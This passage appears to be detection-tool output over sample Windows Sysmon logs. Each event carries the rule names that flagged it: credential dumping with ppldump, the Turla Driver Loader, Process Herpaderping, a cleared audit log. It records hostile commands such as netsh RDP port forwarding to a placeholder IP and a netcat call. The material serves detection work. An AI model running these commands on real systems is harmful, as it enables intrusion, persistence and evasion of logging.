a.png","Company":"?","CurrentDirectory":"c:\\Users\\Public\\BYOV\\ZAM64\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC","Image":"C:\\Users\\Public\\BYOV\\ZAM64\\ppldump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-21D2-5E41-0000-002034770900","LogonId":"0x97734","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-27FE-5E41-0000-0010DD653800","ParentProcessId":4236,"ProcessGuid":"747F3D96-2B98-5E41-0000-00109C904700","ProcessId":5016,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 
10:08:24.525"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":20012,"Execution_attributes":{"ProcessID":2728,"ThreadID":3456},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-02-10T10:08:24.535095Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"chost.exe payload.bin","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\evasion\\","Description":"?","FileVersion":"?","Hashes":"SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25","Image":"C:\\Users\\Public\\tools\\evasion\\chost.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"?","ParentCommandLine":"\"C:\\windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-001025004E3A","ParentProcessId":30572,"ProcessGuid":"00247C92-20BD-5EFE-0000-00106D029D3A","ProcessId":16900,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 
18:00:29.612"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116720,"Execution_attributes":{"ProcessID":5320,"ThreadID":6908},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T18:00:29.615842Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Conhost Parent Process Executions"],"event":{"Event":{"EventData":{"CommandLine":"notepad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Notepad","FileVersion":"10.0.18362.693 (WinBuild.160101.0800)","Hashes":"SHA1=C401CD335BA6A3BDAF8799FDC09CDC0721F06015,MD5=06E6C0482562459ADB462CA9008262F8,SHA256=E5D90BEEB6F13F4613C3153DABBD1466F4A062B7252D931F37210907A7F914F7,IMPHASH=E2D17AC7541817AA681AE8FF7734AD89","Image":"C:\\Windows\\System32\\notepad.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"NOTEPAD.EXE","ParentCommandLine":"\\??\\C:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1","ParentImage":"C:\\Windows\\System32\\conhost.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-00105A024E3A","ParentProcessId":29168,"ProcessGuid":"00247C92-20BD-5EFE-0000-00105C059D3A","ProcessId":16788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 
18:00:29.642"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116722,"Execution_attributes":{"ProcessID":5320,"ThreadID":6908},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T18:00:29.650400Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"spooler.exe payload.bin","Company":"?","CurrentDirectory":"c:\\Users\\Public\\tools\\cinj\\","Description":"?","FileVersion":"?","Hashes":"SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4","Image":"C:\\Users\\Public\\tools\\cinj\\spooler.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1CE4-5EFE-0000-00208F9C0800","LogonId":"0x89c8f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1E44-5EFE-0000-001096443700","ParentProcessId":1140,"ProcessGuid":"747F3D96-1EA9-5EFE-0000-0010B1F13D00","ProcessId":6892,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-02 
17:51:37.815"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":304593,"Execution_attributes":{"ProcessID":3324,"ThreadID":4016},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-07-02T17:51:37.819891Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Netsh Port Forwarding","Netsh RDP Port Forwarding"],"event":{"Event":{"EventData":{"CommandLine":"netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"Network Command Shell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0,MD5=784A50A6A09C25F011C3143DDD68E729,SHA256=661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-DC3E-5CE6-0000-00102BC97200","ParentProcessId":712,"ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 
17:46:04.651"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1026,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:46:04.671625Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"1.2.3.5/3389","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\PortProxy\\v4tov4\\tcp\\1.2.3.4/8001","UtcTime":"2019-05-23 17:46:05.022"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":1027,"Execution_attributes":{"ProcessID":2032,"ThreadID":2092},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-23T17:46:05.022129Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"nc.exe 127.0.0.1 
1337","Company":"?","CurrentDirectory":"C:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-9DC3-5E75-0000-00205F930200","LogonId":"0x2935f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9E06-5E75-0000-00107D541000","ParentProcessId":6088,"ProcessGuid":"747F3D96-9F77-5E75-0000-0010D2E62000","ProcessId":3364,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 05:00:39.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243567,"Execution_attributes":{"ProcessID":2860,"ThreadID":3508},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T05:00:39.226538Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-9DBA-5E75-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9F77-5E75-0000-001090F32000","ParentProcessId":2416,"ProcessGuid":"747F3D96-9F7D-5E75-0000-00104E062100","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 05:00:45.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243570,"Execution_attributes":{"ProcessID":2860,"ThreadID":3508},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-03-21T05:00:45.087155Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\Start","UtcTime":"2019-05-26 
04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4859,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:42.625851Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\ImagePath","UtcTime":"2019-05-26 04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4860,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:42.645880Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory","Suspect Svchost Activity"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"6.1.7600.16385 
(win7_rtm.090713-1255)","Hashes":"SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-8DBD-5CEA-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","ParentImage":"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe","ParentProcessGuid":"365ABB72-0FA6-5CEA-0000-0010FEC30A00","ParentProcessId":3884,"ProcessGuid":"365ABB72-0FA7-5CEA-0000-001064C60A00","ProcessId":3908,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-26 04:01:43.557"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution_attributes":{"ProcessID":984,"ThreadID":2352},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-05-26T04:01:43.567204Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"Furutaka.exe dummy2.sys","Company":"UG North","CurrentDirectory":"c:\\Users\\Public\\BYOV\\TDL\\","Description":"Turla Driver 
Loader","FileVersion":"1.1.5.1904","Hashes":"SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-12FA-5E41-0000-0020171A0300","LogonId":"0x31a17","OriginalFileName":"Furutaka.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1363-5E41-0000-0010356F1500","ParentProcessId":8864,"ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"TurlaDriverLoader","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 08:28:12.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":18762,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.856363Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-02-10 08:28:12.870","Image":"c:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\drivers\\VBoxDrv.sys","UtcTime":"2020-02-10 
08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":18763,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.876766Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18764,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.888628Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"\\??\\C:\\Windows\\system32\\drivers\\VBoxDrv.sys","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\ImagePath","UtcTime":"2020-02-10 
08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18765,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:12.899736Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18767,"Execution_attributes":{"ProcessID":2728,"ThreadID":3876},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:13.091460Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"NT Kernel & System","FileVersion":"10.0.17763.973 
(WinBuild.160101.0800)","Hashes":"SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ImageLoaded":"C:\\Windows\\System32\\ntoskrnl.exe","OriginalFileName":"ntkrnlmp.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"Microsoft® Windows® Operating System","RuleName":"Supicious image loaded - ntoskrnl","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2020-02-10 08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":18769,"Execution_attributes":{"ProcessID":2728,"ThreadID":3888},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2020-02-10T08:28:13.147582Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - Security audit log was 
cleared"],"event":{"Event":{"System":{"Channel":"Security","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":1102,"EventRecordID":772605,"Execution_attributes":{"ProcessID":5424,"ThreadID":5816},"Keywords":"0x4020000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"},"Security":null,"Task":104,"TimeCreated_attributes":{"SystemTime":"2020-09-23T16:49:41.578692Z"},"Version":0},"UserData":{"LogFileCleared":{"SubjectDomainName":"3B","SubjectLogonId":"0x7b186","SubjectUserName":"Administrator","SubjectUserSid":"S-1-5-21-308926384-506822093-3341789130-500"},"LogFileCleared_attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"}}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-27 10:15:20.376","Image":"c:\\Users\\bouss\\Downloads\\ProcessHerpaderping.exe","ProcessGuid":"00247C92-F3AE-5F97-0000-00106ABA0418","ProcessId":21756,"RuleName":"","TargetFilename":"C:\\Users\\bouss\\Downloads\\samir.exe","UtcTime":"2020-10-27 10:17:18.369"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":11,"EventRecordID":2246491,"Execution_attributes":{"ProcessID":5400,"ThreadID":6548},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-27T10:17:18.369342Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["In-memory 
PowerShell"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"System.Management.Automation","FileVersion":"6.1.7601.17514","Hashes":"SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000","Image":"C:\\Windows\\System32\\notepad.exe","ImageLoaded":"C:\\Windows\\assembly\\NativeImages_v2.0.50727_32\\System.Management.A#\\4b93b6bd71723bed2fa9dd778436dd5e\\System.Management.Automation.ni.dll","ProcessGuid":"365ABB72-3D1B-5CE0-0000-0010C3840B00","ProcessId":2840,"Product":"Microsoft (R) Windows (R) Operating System","RuleName":"Defense Evasion - Unmanaged PowerShell Detected","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-05-18 17:16:18.786"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":7,"EventRecordID":18732,"Execution_attributes":{"ProcessID":1940,"ThreadID":2004},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-05-18T17:16:18.833171Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["(Built-in Logic) - New User 
